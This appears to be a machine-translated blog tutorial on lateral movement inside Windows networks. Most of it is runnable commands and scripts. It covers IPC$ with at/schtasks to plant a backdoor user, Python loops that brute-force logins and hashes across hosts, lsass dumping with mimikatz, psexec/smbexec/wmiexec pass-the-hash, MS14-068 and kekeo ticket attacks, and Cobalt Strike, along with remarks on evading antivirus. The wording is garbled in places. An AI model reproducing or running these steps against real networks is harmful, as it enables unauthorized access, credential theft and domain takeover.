Summary of Two Ways of Horizontal Movement of 0x00 Intranet
There are two ways to move the intranet horizontally: transmission and vulnerability:
Delivery is through a set of built-in protocols and commands.
For example:
at,schtasks,
psexec,smbexec,
wmic,vmiexec,
PTH,PTT,PTK,
winrs, winrm, RDP, SPN, etc., to achieve penetration into other intranet hosts,
Use tools: penetration by CobaltStrike, Ladon, etc.
A vulnerability is a host or other CV vulnerability that penetrates the host
For example:
CVE-2014-6324
CVE-201717010
CVE-2020-1472, etc., to achieve penetration into other intranet hosts,
0x01 lateral movement-at, schtasks transfer
Get the clear password or hash value of another host based on opening port 139,445
1) at transfer:
For at command, if the host is lower than win2012 and the user's clear password of the target system is known, the command can be executed directly on the remote host. First, at, sc protocol needs to be open on port 135/445, generally the host will be open. If it is not open, it will be moved by other means.
Utilize process
- Establish an IPC link to the target host and know the password information of the host account of the other party. Permission issues may occur if not successful
- Copy the command script to the target host
- View target time, create scheduled tasks (at, schtasks) to execute copied scripts regularly
- Delete IPC Link
establish ipc Connect: net use \\192.168.213.163\ipc$ "123.com" /user:hsyy.com\administrator Local production user.bat File local c Disk execution command script: net user haha 123.com /add Upload files to the other host C Disk: copy user.bat \\192.168.213.163\c$ Add commands to the other host to execute the task: at \\192.168.213.163 12:20 c:\user.bat Wait to see the other host add user haha
Detailed steps: Set up a connection
Copy files to each other, add process tasks
View Added Successfully
establish IPC Common error codes (1)5: Access is denied, possibly because the user used is not an administrator and needs to be elevated first (2)51: Network problems, Windows Unable to find network path (3)53: No network path found, possibly IP Address error, target not turned on, target Lanmanserver Service not started, has Firewall issues (4)67: Network name not found, local Lanmanworkstation Service not started, target deleted ipc$ (5)1219: Provided credentials conflict with an existing credential set indicating that it has been established IPC$,Need to delete first (6)1326: Account password error (7)1792: target NetLogon The service is not started, which is often the case with connection domain control (8)2242: User password expires, target account policy, force periodic password changes #Reasons for failure to establish IPC (1)The target system is not NT Or more operating systems (2)The other party is not open IPC$Share (3)The other party has not opened ports 139 or 445 or is blocked by a firewall (4)Error in output command, account password
2) schtasks Delivery:
For at commands that require the other host to be higher than win2012, sc support 2012 includes the above versions
Utilization process: Establish ipc Connect: net use \\192.168.213.163\ipc$ "123.com" /user:hsyy.com\administrator Copy script bat Files: copy user.bat \\192.168.213.163\c$ Establish adduser Task Correspondence Execution File: schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F Perform file tasks: schtasks /run /s 192.168.213.163 /tn adduser /i Delete Execution File Task: schtasks /delect /s 192.168.213.163 /tn adduser /f
3) atexec.exe transverse osmosis hash transfer:
atexec is easier to kill, so exemption is needed in the real world.
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #Batch Detection of IP Correspondence Clear Text Connect FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #Batch Detection of IP Correspondence Clear Text Echo Version FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #Batch Detection Clear Text Corresponding IP Echo Version FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #Batch Detection HASH Corresponding IP Echo Version
4) Phon batch IP, password, account survival:
Generate exe file:
File location:
Use pyinstaller Pack exe Run the file: python Batch Detection: Using Collected Domains IP Information, password account information as dictionary import os,time ips={ '192.168.213.163', '192.168.213.100', '192.168.213.120', '192.168.213.132' } users={ 'administrator', 'user', 'haha', 'Administrator', 'lily' } passs={ 'admin', '123.com', '', '123456' } for ip in ips: for user in users: for mima in passs: exec="net use \\"+"\\"+ip+'\ipc$'+mima+' /user:hsyy.com\\'+user print('--->'+exec+'--->') os.system(exec) time.sleep(1)
0x02 lateral movement - based on SMB psexec, smbexec transfer
psexec, smbexec is a connection based on SMB service and needs to open port 445 to get clear text or hash value
First introduce procdump and minikatz to get clear text password and hash value of this machine
Install procdump: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
Generate lsass.dmp file: procdump-accepteula-ma lsass.exe lsass.dmp
Decrypt the password using mnikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
1) psexec transfer:
The first is to establish an ipc connection, clear text or hash delivery, which requires the administrator privileges of the other party, otherwise an error will occur
psexec is Microsoft's official and will not be killed: https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
establish ipc Connect: net use \\192.168.213.163\ipc$ "123.com" /user:administrator Use psexec Return cmd Window: psexec \\192.168.213.163 -s cmd
Second: provide clear account password without setting up IPC
delete ipc Connect: net use * /delete
Direct clear text connection: psexec \\192.168.213.163 -u administrator -p 123.com -s cmd hash Connect: psexec -hashes :$HASH$ ./administrator@10.1.2.3 psexec -hashes :$HASH$ domain/administrator@10.1.2.3 psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 Official Pstools Unable Mining. Need to use impacket Toolkit is easy to use and kill
2) smbexec delivery
No need to establish ipc link plain text or hash delivery first
This is using the impacket toolkit,
exe download address: https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
py version: https://github.com/SecureAuthCorp/impacket
Clear text delivery command: smbexec hsyy.com/administrator:123.com@192.168.213.163 hash Delivery: smbexec -hashes :$HASH$ ./admin@192.168.213.163 smbbexec -hashes :$HASH$ domain/admin@192.168.213.163
0x03 lateral movement, WMI-based wmic, vmiexec delivery
The 135 port service needs to be turned on to support plain text and hash delivery without leaving any traces in the log
1) wmic delivery
1. No echo in clear text delivery
Make a connection and the returned value needs to be read by the other host: wmic /node:192.168.213.163 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig >C:\1.txt"
Read value:
2. Echoes are delivered in clear text, and vbs files are required
cscript //nologo wmiexec.vbs /shell 192.168.213.163 administrator 123.com
3. Passing an echo exe version in plain text or hash using the suite impacket wmiexec may be susceptible to murder
Toolkit address: https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
Workgroup environment: wmiexec ./account:Password@192.168.3.32 "whoami" Domain environment: wmiexec god/administrator:123.com@192.168.3.21 "whoami" hash Delivery: wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.213.163 "whoami" wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.213.163 "whoami" See c Disk: wmiexec hsyy.com/administrator:123.com@192.168.213.163 "dir /c"
3.py batch detection, circular account password,
Use python Of pyinstaller Module Export exe implement pyinstaller.exe -F fuck_neiwang_002.py
EXP: import os,time ips={ '192.168.3.21', '192.168.3.25', '192.168.3.29', '192.168.3.30', '192.168.3.32' } users={ 'Administrator', 'boss', 'dbadmin', 'fileadmin', 'mack', 'mary', 'webadmin' } hashs={ 'ccef208c6485269c20db2cad21734fe7', '518b98ad4178a53695dc997aa02d455c' } for ip in ips: for user in users: for mimahash in hashs: #wmiexec -hashes :hashgod/user@ipwhoami exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami" print('--->' + exec + '<---') os.system(exec) time.sleep(0.5)
0x04 lateral movement-PTH, PTK, PTT transfer
With these three protocols, it is important to note that when using PTH delivery, when patch kb2871997 exists on the other host, PTH with minikatz can only connect domain users, not other groups of users. PTK transfer requires patch kb2871997 on the other host before PTK can connect domain users or groups. Using ase256 connection, PTH and PTK transfer are based on NTML.Authentication, while PTT delivery is based on the kerbros protocol,
Summary:
1) PTH with minikatz transfer:
Patched, ntlm passed:
Title: privilege::debug ntlm Delivery: sekurlsa::pth /user:administrator /domain:hsyy.com /ntlm:ccef208c6485269c20db2cad21734fe7 ntml Intra-group collisions: there may be identical administrtor User's hash value sekurlsa::pth /user:administrator/domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c ntml Domain User Transfer: sekurlsa::pth /user:hsyy /domain:hsyy.com /ntlm:ccef208c6485269c20db2cad21734fe7
2) Patch kb2871997 is required for PTK to cooperate with minikatz transfer
Use minikatz Obtain aes256_hmac: sekurlsa::ekeys Delivery connection: sekurlsa::pth /user:mary/domain:hsyy.com/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
3)PTT is transmitted by ms14-068:
ms14-068 is able to obtain domain-controlled system privileges from ordinary domain users
Steps to take ownership: MS14-068 powershell execution
1. View the current sid:whoami/user
2. Empty all credentials in the current machine, if any domain member credentials will affect credential forgery: mimikatz # kerberos::purge
3. View the current machine credentials: mimikatz # kerberos::list
4. Inject ticket into memory: mimikatz # kerberos::ptc ticket file
5. Generate TGT data using ms14-068: ms14-068.exe-u domain member name@domain name-s sid-d domain controller address-p domain member password
6. Note injection memory: turn on mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache"Exit exit
7. View the voucher list klist
8. Use of rights: dir 192.168.213.132 \c$
Step implementation:
1. View sid:whoami/user
2. Generate tickets using ms14-068: ms14-068.exe-u domain member name@domain name-s sid-d domain controller address-p domain member password
3. Inject ticket:
4. Connect Domain Control to take ownership:
If not recognized, change IP to domain computer name
4) PTT is transferred by kekeo:
PTT Knowledge Point: PTT Rights Maintenance Technology: Golden ticket Silver ticket STLVER ticket
Steps to achieve:
1. Generate ticket ke kekeo "tgt:: ask/user:mary/domain:hsyy.com/ntlm:518b98ad4178a53695dc997aa02d455c"
2. Import ticket kerberos::ptt TGT_haha@HSYY.COM_krbtgt~hsyy.com@GOD.ORG.kirbi
3. View the voucher klist
4. Load dir \192.168.213.163\c$using net use
5) PTT uses local tickets with mimikatz: Administrator rights are required:
Promote permissions: privilege::debug
Export ticket: sekurlsa::tickets/export
Utilize tickets: kerberos:: PTT xxxxxxxxx.xxxx.kirbi
6) Ladon tools recommended:
Testing and Acceptance of Domestic Ladon Intranet Killer
Implementation: Information Collection - Protocol Scanning - Vulnerability Probe - Delivery Attacks, etc.
Use address: https://github.com/k8gege/Ladon
0x05 Transverse Transfer-RDP, SPN Scanning Technology
1) RDP delivery:
RDP technology is similar to ssh Remote Connection on linux, knowing each other's IP and account password to connect
Port 3389 needs to be opened
cmd run: mstsc
Clear text transmission
hash delivery comparison chicken ribs
2) SPN scan:
When a computer joins a domain, the primary SPN is automatically added to the ServicePrincipalName property of the domain's computer account. Install a new service
The SPN is then recorded in the appropriate attributes of the computer account.
SPN scanning is also known as Scan Kerberos Service Instance Name. The best way to discover a service in the Active Directory is SPN scanning. SPN scanning finds a service by requesting a service principal name for a specific SPN type. The main feature of SPN scanning is that it is unnecessary compared to network port scanning.
Check service ports by connecting each IP address in the network (there will be no large number of warnings due to rules that trigger devices such as IPS. IDS in the intranet)
Because SPN queries are part of Kerberos ticket behavior, detection is difficult.
Since SPN scanning is based on LDAP protocol to query domain controllers, an attacker only needs to obtain a common domain user privilege to perform SPN scanning.
0x06 Horizontal Move-CobaltStrike
Use process:
1.Start-Configure-Monitor Execution-.Online Title Collection (Network, Voucher, Location, etc.)-Penetrate
2. About Startup and Configuration
3. About Title and Plug-in Loading
4. About Information Collection Commands
5 About view automation
Installation use: http://www.kxsy.work/2021/08/05/shen-tou-shen-qi-cs-an-zhuang-xiang-xi-jiao-cheng/
Domain penetration reference: http://www.kxsy.work/2021/08/17/strike-yu-shen-tou/
CS4.0 Manual:
Links:https://pan.baidu.com/s/1knqCFSZ2VxUKKAGE6INRiw
Extraction Code: hsyy
Communication Learning:
Blog: www.kxsy.work
CSND Community: Addressing Fever